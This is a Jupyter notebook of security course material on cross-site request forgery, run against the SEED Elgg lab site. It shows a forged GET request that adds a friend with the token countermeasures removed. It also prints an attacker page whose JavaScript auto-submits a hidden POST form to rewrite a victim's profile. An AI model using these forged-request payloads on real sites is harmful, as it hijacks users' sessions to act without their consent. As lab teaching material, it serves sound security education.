## <center> Cross-Site Request Forgery </center>

In a terminal, run the following commands:

```
$ conda install -c anaconda beautifulsoup4
$ conda install -c anaconda requests
```

### Relevant Term Definition

- HTTP request/response messages
- Web session
- Cookie

#### HTTP request/response messages
- HTTP is an *asymetric request-response client-server protocol*:
  - A client sends a request message to an HTTP server
  - The server returns a response message
- HTTP is a stateless protocol. 
  - The current request does not know what has been done in the previous requests.

<center> <img src="figure/csrf/HTTP_Steps.png" width="600"/>
    *http://www.ntu.edu.sg/home/ehchua/programming/webprogramming/http_basics.html*

An HTTP message consists of a *message header* and an optional *message body*, separated by a *blank line*. 
<center> <img src="figure/csrf/HTTP_MessageFormat.png" width="600"/>

In an HTTP request message, the first line in the message header is a *request line* with the following syntax:
- *request-method-name request-URI HTTP-version*
- *request-method-name*: GET, POST, HEAD, OPTIONS
- *request-URI*: specifies the resource requested (relative to the web server)
- *HTTP-version*: HTTP/1.0 or HTTP/1.1 (most likely not relevant)


<center> <img src="figure/csrf/HTTP_RequestMessage.png" width="600"/>

In [2]:
import requests
from requests import Request, Session

s = Session()

req = requests.Request('GET', 'http://www.google.com')
prepared_req = req.prepare()
print(prepared_req.method)
print(prepared_req.url)

GET
http://www.google.com/


<center> <img src="figure/csrf/HTTP_ResponseMessage.png" width="600"/>

In [90]:
import bs4

resp_google = s.send(prepared_req)
for item in resp_google.headers:
    print(item,': ', resp_google.headers[item])

Date :  Sun, 07 Oct 2018 22:58:13 GMT
Expires :  -1
Cache-Control :  private, max-age=0
Content-Type :  text/html; charset=ISO-8859-1
P3P :  CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server :  gws
X-XSS-Protection :  1; mode=block
X-Frame-Options :  SAMEORIGIN
Set-Cookie :  1P_JAR=2018-10-07-22; expires=Tue, 06-Nov-2018 22:58:14 GMT; path=/; domain=.google.com, NID=140=5NMALvJO1YBP1w1lWmEoMvEM4BZqi01ZzcK8N2Q9j4unDqNxI0BrMSyUE5XjhEi9y35NuDBXNC1iiFmVKh6Q8epc1_S77NmCqsTXL_eqSJ7y01JjAL4PZ9nWijZoHTif; expires=Mon, 08-Apr-2019 22:58:14 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges :  none
Vary :  Accept-Encoding
Transfer-Encoding :  chunked


In [91]:
resp_soup = bs4.BeautifulSoup(resp_google.text, 'html.parser')
print (resp_soup.prettify())

<!DOCTYPE doctype html>
<html itemscope="" itemtype="http://schema.org/WebPage" lang="en">
 <head>
  <meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for." name="description"/>
  <meta content="noodp" name="robots"/>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"/>
  <title>
   Google
  </title>
  <script nonce="/hUQKyIbFX80GKmPJr18IQ==">
   (function(){window.google={kEI:'hY-6W9XFO5Kb_QaI7proBg',kEXPI:'0,1352960,787,57,1957,584,433,282,1124,199,1026,731,141,184,64,361,650,49,47,22,39,241,473,81,139,178,2337529,151,32,329294,1294,12383,4855,32692,15247,867,316,10445,1402,5902,479,3335,2,2,6801,365,1216,2102,1263,1051,1819,1372,224,1017,1195,266,5107,575,1119,2,1306,606,1826,58,2,1,3,1297,1712,2611,2096,658,636,8,302,1268,222,551,83,192,227,730,274,6

#### Web session:
- HTTP is a stateless protocol (RFC 2616)
- Modern web applications can involve multiple HTTP requests and responses per session. 
- Sessions provide the ability to retaining information and status about each user throughout. 
- Sessions are created and stored on the webserver. 
- Each session has a unique identifier, called Session ID.

#### Cookie:

- Is part of the HTTP request/response headers. 
- Has limited size. 
- Stores different things, include:
  - Session IDs
  - Tracking IDs (Google Analytics)
  - User preferences (language, currency, timezone, etc)
- Can be configured to live
  - until the browser window is closed
  - until a configurable period expires (1 week, 1 month, 1 year ...)


<center> <img src="figure/csrf/csrf4.png" width="600"/>
    *https://cscie12.dce.harvard.edu/lecture_notes/2007-08/20080423/*

In [5]:
import bs4
# Visit https://news.ycombinator.com/news on a web browser and create an account
# Sign in to your account
# Copy the content of the cookie to replace the 'Damark81...' string
cookie = {'user': 'Damark81&zO41CnMWAEdBjLVQA5JKuqJ9I77wZElP'}
y_resp = requests.get('https://news.ycombinator.com/news', cookies=cookie)
print (bs4.BeautifulSoup(y_resp.text, 'html.parser').prettify())

# What happens after you logout of Y_Combinator?

<html op="news">
 <head>
  <meta content="origin" name="referrer"/>
  <meta content="width=device-width, initial-scale=1.0" name="viewport"/>
  <link href="news.css?QqvzR7EMp9FeNrprN9Bd" rel="stylesheet" type="text/css"/>
  <link href="favicon.ico" rel="shortcut icon"/>
  <link href="rss" rel="alternate" title="RSS" type="application/rss+xml"/>
  <title>
   Hacker News
  </title>
 </head>
 <body>
  <center>
   <table bgcolor="#f6f6ef" border="0" cellpadding="0" cellspacing="0" id="hnmain" width="85%">
    <tr>
     <td bgcolor="#ff6600">
      <table border="0" cellpadding="0" cellspacing="0" style="padding:2px" width="100%">
       <tr>
        <td style="width:18px;padding-right:4px">
         <a href="https://news.ycombinator.com">
          <img height="18" src="y18.gif" style="border:1px white solid;" width="18"/>
         </a>
        </td>
        <td style="line-height:12pt; height:10px;">
         <span class="pagetop">
          <b class="hnname">
           <a href="news">
 

### What is a Cross-Site Request?

- When a page from a website sends an HTTP request back to the website, it is called a **same-site request**.
- If the HTTP request is sent to a different website, it is called a **cross-site request**.
- **Cross-site** requests are used to connect multiple websites across the Web. 
  - Embedded URL
  - Shared authentication
  - Advertisement links
  - ...

<center> <img src="figure/csrf/csrf1.jpg" width="600"/>

#### Attack Surface:
- If site A has access to site B's cookie on user browser, it can generate HTTP messages and attach B's cookie to these messages. 
- These messages will have the same credentials as any message generated from the original web session between the user and site B. 

<center> <img src="figure/csrf/csrf2.jpg" width="600"/>

### What is a Cross-Site Request Forgery Attack (CSRF)?

- A CSRF attack involves three parties: a victim user, a targeted website, and a malicious website. 
- The victim has an active session with the targeted website while visiting the malicious website. 
- The malicious website forges a cross-site HTTP request to the targeted website. 
- Since the browser will attach all cookies to the forged request, when the target site receives the HTTP request, if there is no countermeasure to identify the forged request, the request will be processed. 
- Security breach happens. 

<center> <img src="figure/csrf/csrf3.png" width="700"/>

In [6]:
import json
import requests

URL = "http://www.csrflabelgg.com"

csrflabelgg_response = requests.get(URL)
for item in csrflabelgg_response.headers:
    print(item,': ', csrflabelgg_response.headers[item])

Date :  Thu, 11 Oct 2018 18:37:14 GMT
Server :  Apache/2.4.18 (Ubuntu)
Set-Cookie :  Elgg=i77pkn6ijjtgfcmmu4ngqg9k67; path=/
Expires :  Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control :  no-store, no-cache, must-revalidate
Pragma :  no-cache
X-Frame-Options :  SAMEORIGIN
Vary :  Accept-Encoding
Content-Encoding :  gzip
Content-Length :  1996
Keep-Alive :  timeout=5, max=100
Connection :  Keep-Alive
Content-Type :  text/html; charset=UTF-8


<center> <img src="figure/csrf/csrflabelgg_notlogin.png" width="700"/>

In [97]:
import bs4

print(bs4.BeautifulSoup(csrflabelgg_response.text, 'html.parser').prettify())

<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>
   CSRF Lab Site
  </title>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <meta name="description"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
  <meta content="yes" name="mobile-web-app-capable"/>
  <meta content="yes" name="apple-mobile-web-app-capable"/>
  <link href="http://www.csrflabelgg.com/?view=rss" rel="alternative" title="RSS" type="application/rss+xml"/>
  <link href="http://www.csrflabelgg.com/cache/1501099611/default/aalborg_theme/homescreen.png" rel="apple-touch-icon"/>
  <link href="http://www.csrflabelgg.com/cache/1501099611/default/favicon.ico" rel="icon"/>
  <link href="http://www.csrflabelgg.com/cache/1501099611/default/favicon.svg" rel="icon" sizes="16x16 32x32 48x48 64x64 128x128" type="image/svg+xml"/>
  <link href="http://www.csrflabelgg.com/cache/1501099611/default/fav

In [99]:
payload = {
    'username': 'alice',
    'password': 'seedalice',
    'persistent': 'false',
}

csrflabelgg_response_post = requests.post("http://www.csrflabelgg.com/action/login", data = payload)
for item in csrflabelgg_response_post.headers:
    print(item,': ', csrflabelgg_response_post.headers[item])

Date :  Sun, 07 Oct 2018 23:24:53 GMT
Server :  Apache/2.4.18 (Ubuntu)
Expires :  Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control :  no-store, no-cache, must-revalidate
Pragma :  no-cache
X-Frame-Options :  SAMEORIGIN
Vary :  Accept-Encoding
Content-Encoding :  gzip
Content-Length :  2941
Keep-Alive :  timeout=5, max=98
Connection :  Keep-Alive
Content-Type :  text/html; charset=UTF-8


<center> <img src="figure/csrf/csrflabelgg_alice.png" width="700"/>

In [100]:
import bs4

print(bs4.BeautifulSoup(csrflabelgg_response_post.text, 'html.parser').prettify())

<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>
   All Site Activity : CSRF Lab Site
  </title>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <meta name="description"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
  <meta content="yes" name="mobile-web-app-capable"/>
  <meta content="yes" name="apple-mobile-web-app-capable"/>
  <link href="http://www.csrflabelgg.com/activity?view=rss" rel="alternative" title="RSS" type="application/rss+xml"/>
  <link href="http://www.csrflabelgg.com/cache/1501099611/default/aalborg_theme/homescreen.png" rel="apple-touch-icon"/>
  <link href="http://www.csrflabelgg.com/cache/1501099611/default/favicon.ico" rel="icon"/>
  <link href="http://www.csrflabelgg.com/cache/1501099611/default/favicon.svg" rel="icon" sizes="16x16 32x32 48x48 64x64 128x128" type="image/svg+xml"/>
  <link href="http://www.csrflabelgg.com/

### CSRF on HTTP GET Request
- How is the request formed on the website?
- How can you get the users to access the malicious and invoke this request?

- http://www.csrflabelgg.com is a popular social media site
- There are five users: (Name, login, password)
  - Admin admin seedelgg
  - Alice alice seedalice
  - Boby boby seedboby
  - Charlie charlie seedcharlie
  - Samy samy seedsamy

- Samy wants to be added to Alice's friend list without Alice's consent. 
- To understand how Elgg's add friend service works, Samy created a bogus account named Charlie

<center> <img src="figure/csrf/charlie_main.png" width="700"/>

In [7]:
from requests import Request, Session
import bs4

s_charlie = Session()

charlie_payload = {
    'username': 'charlie',
    'password': 'seedcharlie',
    'persistent': 'true',
}

charlie_main = s_charlie.post("http://www.csrflabelgg.com/action/login", data = charlie_payload)
for item in charlie_main.headers:
    print(item,': ', charlie_main.headers[item])

print(bs4.BeautifulSoup(charlie_main.text, 'html.parser').prettify())

Date :  Thu, 11 Oct 2018 18:44:42 GMT
Server :  Apache/2.4.18 (Ubuntu)
Expires :  Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control :  no-store, no-cache, must-revalidate
Pragma :  no-cache
X-Frame-Options :  SAMEORIGIN
Vary :  Accept-Encoding
Content-Encoding :  gzip
Content-Length :  2940
Keep-Alive :  timeout=5, max=98
Connection :  Keep-Alive
Content-Type :  text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>
   All Site Activity : CSRF Lab Site
  </title>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <meta name="description"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
  <meta content="yes" name="mobile-web-app-capable"/>
  <meta content="yes" name="apple-mobile-web-app-capable"/>
  <link href="http://www.csrflabelgg.com/activity?view=rss" rel="alternative" title="RSS" type="application/rss+xml"/>
  <link href="http://ww

To add a friend, we need to visit the members list:

<center> <img src="figure/csrf/charlie_members.png" width="600"/>

In [103]:
charlie_members = s_charlie.get("http://www.csrflabelgg.com/members")
for item in charlie_members.headers:
    print(item,': ', charlie_members.headers[item])

print(bs4.BeautifulSoup(charlie_members.text, 'html.parser').prettify())

Date :  Mon, 08 Oct 2018 00:28:31 GMT
Server :  Apache/2.4.18 (Ubuntu)
Expires :  Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control :  no-store, no-cache, must-revalidate
Pragma :  no-cache
X-Frame-Options :  SAMEORIGIN
Vary :  Accept-Encoding
Content-Encoding :  gzip
Content-Length :  3294
Keep-Alive :  timeout=5, max=100
Connection :  Keep-Alive
Content-Type :  text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>
   Newest members : CSRF Lab Site
  </title>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <meta name="description"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
  <meta content="yes" name="mobile-web-app-capable"/>
  <meta content="yes" name="apple-mobile-web-app-capable"/>
  <link href="http://www.csrflabelgg.com/members?view=rss" rel="alternative" title="RSS" type="application/rss+xml"/>
  <link href="http://www.c

To add Samy to Charlie's friend list, Charlie needs to go to Samy's profile and click on the **Add Friend** button. 

<center> <img src="figure/csrf/charlie_add.png" width="600"/>

In [104]:
charlie_add = s_charlie.get("http://www.csrflabelgg.com/profile/samy")
for item in charlie_add.headers:
    print(item,': ', charlie_add.headers[item])

print(bs4.BeautifulSoup(charlie_add.text, 'html.parser').prettify())

Date :  Mon, 08 Oct 2018 00:32:34 GMT
Server :  Apache/2.4.18 (Ubuntu)
Expires :  Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control :  no-store, no-cache, must-revalidate
Pragma :  no-cache
X-Frame-Options :  SAMEORIGIN
Vary :  Accept-Encoding
Content-Encoding :  gzip
Content-Length :  2571
Keep-Alive :  timeout=5, max=100
Connection :  Keep-Alive
Content-Type :  text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>
   Samy : CSRF Lab Site
  </title>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <meta name="description"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
  <meta content="yes" name="mobile-web-app-capable"/>
  <meta content="yes" name="apple-mobile-web-app-capable"/>
  <link href="http://www.csrflabelgg.com/profile/samy?view=rss" rel="alternative" title="RSS" type="application/rss+xml"/>
  <link href="http://www.csrfla

The critical GET:
- http://www.csrflabelgg.com/action/friends/add?friend=45&amp;__elgg_ts=1538958754&amp;__elgg_token=z57VH-ptymaDB5XlT5NJHg
- We can ignore everything after the first `&`, as those are disabled countermeasures
- http://www.csrflabelgg.com/action/friends/add?friend=45

In [8]:
# We can test with Charlie's session:

s_charlie.get("http://www.csrflabelgg.com/action/friends/add?friend=45")

charlie_profile = s_charlie.get("http://www.csrflabelgg.com/profile/charlie")
for item in charlie_profile.headers:
    print(item,': ', charlie_profile.headers[item])

print(bs4.BeautifulSoup(charlie_profile.text, 'html.parser').prettify())

Date :  Thu, 11 Oct 2018 18:51:56 GMT
Server :  Apache/2.4.18 (Ubuntu)
Expires :  Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control :  no-store, no-cache, must-revalidate
Pragma :  no-cache
X-Frame-Options :  SAMEORIGIN
Vary :  Accept-Encoding
Content-Encoding :  gzip
Content-Length :  3567
Keep-Alive :  timeout=5, max=97
Connection :  Keep-Alive
Content-Type :  text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>
   Charlie : CSRF Lab Site
  </title>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <meta name="description"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
  <meta content="yes" name="mobile-web-app-capable"/>
  <meta content="yes" name="apple-mobile-web-app-capable"/>
  <link href="http://www.csrflabelgg.com/profile/charlie?view=rss" rel="alternative" title="RSS" type="application/rss+xml"/>
  <link href="http://www.c

Samy is now in Charlie's friend list.

<center> <img src="figure/csrf/charlie_samy.png" width="600"/>

#### How do we get Alice to invoke this GET request?

- http://www.csrflabelgg.com/action/friends/add?friend=45
- https://linhbngo.github.io/Computer-Security/csrf.html

#### Demo inside SEED's Firefox

- Login to www.csrflabelgg.com as Alice (alice/seedalice)
- Open a new tab and visit https://linhbngo.github.io/Computer-Security/csrf.html
- Switch back to Elgg and visit Alice's profile
- Who's Alice's friend?
- How does that happen?

### CSRF on HTTP POST Request

- POST requires explicit click action from users. 
- The action can be forged through Javascript embedded in malicious website. 
- How is the POST request formed on the website?
- How can you get the users to access the malicious and invoke the malicious Javascript?

In [115]:
s_samy = Session()

samy_payload = {
    'username': 'samy',
    'password': 'seedsamy',
    'persistent': 'true',
}

samy_main = s_samy.post("http://www.csrflabelgg.com/action/login", data = samy_payload)
for item in samy_main.headers:
    print(item,': ', samy_main.headers[item])

print(bs4.BeautifulSoup(samy_main.text, 'html.parser').prettify())

Date :  Mon, 08 Oct 2018 01:24:56 GMT
Server :  Apache/2.4.18 (Ubuntu)
Expires :  Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control :  no-store, no-cache, must-revalidate
Pragma :  no-cache
X-Frame-Options :  SAMEORIGIN
Vary :  Accept-Encoding
Content-Encoding :  gzip
Content-Length :  3701
Keep-Alive :  timeout=5, max=98
Connection :  Keep-Alive
Content-Type :  text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>
   All Site Activity : CSRF Lab Site
  </title>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <meta name="description"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
  <meta content="yes" name="mobile-web-app-capable"/>
  <meta content="yes" name="apple-mobile-web-app-capable"/>
  <link href="http://www.csrflabelgg.com/activity?view=rss" rel="alternative" title="RSS" type="application/rss+xml"/>
  <link href="http://ww

In [116]:
samy_edit = s_samy.post("http://www.csrflabelgg.com/profile/samy/edit")
print(bs4.BeautifulSoup(samy_edit.text, 'html.parser').prettify())

<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>
   Edit profile : CSRF Lab Site
  </title>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <meta name="description"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
  <meta content="yes" name="mobile-web-app-capable"/>
  <meta content="yes" name="apple-mobile-web-app-capable"/>
  <link href="http://www.csrflabelgg.com/profile/samy/edit?view=rss" rel="alternative" title="RSS" type="application/rss+xml"/>
  <link href="http://www.csrflabelgg.com/cache/1501099611/default/aalborg_theme/homescreen.png" rel="apple-touch-icon"/>
  <link href="http://www.csrflabelgg.com/cache/1501099611/default/favicon.ico" rel="icon"/>
  <link href="http://www.csrflabelgg.com/cache/1501099611/default/favicon.svg" rel="icon" sizes="16x16 32x32 48x48 64x64 128x128" type="image/svg+xml"/>
  <link href="http://www.csrflabelgg.

In [118]:
samy_test = s_samy.get('https://linhbngo.github.io/Computer-Security/csrf_post.html')
print(bs4.BeautifulSoup(samy_test.text, 'html.parser').prettify())

<html>
 <body>
  <h1>
   This page forges an HTTP POST request.
  </h1>
  <script type="text/javascript">
   function forge_post()
{
  var fields;

  fields = "<input type='hidden' name='name' value='Samy'>";
  fields += "<input type='hidden' name='description' value='SAMY is MY HERO'>";
  fields += "<input type='hidden' name='accesslevel[description]' value='2'>";
  fields += "<input type='hidden' name='guid' value='45'>";

  var p = document.createElement("form");  
  p.action = "http://www.csrflabelgg.com/action/profile/edit";
  p.innerHTML = fields;
  p.method = "post";  
  document.body.appendChild(p); 
  p.submit();
}

window.onload = function() { forge_post();}
  </script>
 </body>
</html>



**Exercise: **

- Done via Firefox inside SEED's virtualbox.
- Login to www.csrflabelgg.com as Samy. 
- In a new tab, visit https://linhbngo.github.io/Computer-Security/csrf_post.html
- What happens?
- How can you substitute Samy's GUID with  Alice's GUID for the malicious site?